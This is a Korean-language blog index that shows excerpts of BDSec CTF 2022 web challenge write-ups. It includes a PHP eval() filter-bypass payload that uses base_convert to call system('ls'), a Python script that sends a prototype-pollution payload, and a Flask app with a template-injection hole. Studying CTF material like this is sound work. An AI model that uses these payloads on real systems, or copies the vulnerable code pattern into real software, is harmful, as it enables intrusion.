HACKINTOANETWORK

OFFENSIVE SECURITY RESEARCHER, PENETRATION TESTER

CTF/BDSec CTF 2022

이 문제는 대회 도중 갑자기 사라졌다(?) 코드를 보면 eval()함수에서 취약점이 발생한다. (아쉽게 코드는 전부 날라갔다..) eval() 함수는 다른 함수를 실행할 수 있다는 취약점있다. 기억상 필터링 때문에 바로 system()함수를 호출할 수 없고 base_convert()함수를 필터링하고 있지 않아 base_convert() 함수로 우회하여 문제를 풀어야 했다. http://206.189.236.145:9001/?calculation=base_convert(1751504350,10,36)(base_convert(9911,10,28)(108).base_convert(9911,10,28)(115)) # system('ls') php > base_convert(1751504350,10,36); sy..

2022. 7. 22.

CTF/BDSec CTF 2022

이 문제는 프로토 타입 취약점을 이용하여 풀 수 있었다. 귀찮아서 자세한 writeup은 나중에 써서 올리겠다. import requests def req_post(api,postData): headers = {'content-type': 'application/json'} url = "http://206.189.236.145:3000/" + api res = session.post(url=url, headers=headers, data=postData) return res.text if __name__ == "__main__": session = requests.session() print(req_post('api/v1/sell','{"__proto__":{"admin": true}}')) print(..

2022. 7. 22.

CTF/BDSec CTF 2022

문제에 들어가면 위와 같은 페이지를 볼 수 있는데 크롬 개발자 도구를 열어보면 index.php.bak 이라는 백업 파일을 다운로드 할 수 있다고 한다. 다운로드하고 .bak을 지우면 아래와 같은 소스코드를 얻을 수 있다. Welcome to Awesome Note Keeping

2022. 7. 22.

CTF/BDSec CTF 2022

이 문제는 소스코드가 주어진다. 소스코드는 아래와 같다. (엄청 간단한 문제라 코드 없이도 풀 수 있다.) from flask import * app = Flask(__name__) @app.route('/',methods=['GET', 'POST']) def base(): person = "" if request.method == 'POST': if request.form['name']: person = request.form['name'] palte = ''' Hi, %s Type your name here:- See magic '''% person return render_template_string(palte) if __name__=="__main__": app.run("0.0.0.0",port=..

2022. 7. 22.